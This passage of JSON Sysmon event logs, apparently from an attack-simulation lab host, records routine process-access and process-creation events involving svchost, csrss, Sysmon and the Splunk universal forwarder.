C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4342,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4343,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4344,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.753\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.753","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4345,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.769\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nTargetProcessId: 3836\r\nTargetImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.769","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-114B-5F25-0000-001016170600}","TargetProcessId":"3836","TargetImage":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4346,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-0010BD190600}\r\nProcessId: 1476\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.863","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-0010BD190600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4347,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-114B-5F25-0000-0010BD190600}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.863","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-114B-5F25-0000-0010BD190600}","TargetProcessId":"1476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4348,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-114B-5F25-0000-0010BD190600}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.863","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-114B-5F25-0000-0010BD190600}","TargetProcessId":"1476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:53:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4349,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.863\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 